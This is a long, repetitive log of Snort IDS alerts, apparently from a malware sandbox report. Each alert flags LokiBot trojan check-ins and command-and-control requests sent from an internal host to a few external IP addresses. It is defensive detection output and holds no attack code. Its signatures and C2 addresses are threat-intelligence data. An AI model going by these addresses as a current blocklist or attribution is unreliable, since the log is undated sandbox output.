                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49178 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49179 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49180 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49181 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49182 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49183 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49184 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49185 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49186 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49187 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49188 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49189 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49189 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49190 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49190 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49191 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49191 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49192 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49192 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49193 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49193 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49194 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49194 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49195 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49195 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49196 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49196 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49196 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49196 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49196 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49197 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49197 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49197 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49197 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49197 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49198 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49198 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49198 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49198 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49198 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49199 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49199 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49199 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49199 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49199 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49200 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49200 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49200 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49200 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49200 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49201 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49201 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49201 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49201 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49201 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49202 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49202 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49202 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49202 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49202 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49203 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49203 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49203 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49203 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49204 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49204 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49205 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49205 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49206 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49206 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49207 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49207 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49208 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49208 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49209 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49209 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49210 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49210 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49211 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49211 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49212 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49212 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49213 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49213 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49214 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49214 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49215 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49216 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49217 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49218 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49219 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49220 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49221 -> 188.114.97.3:80
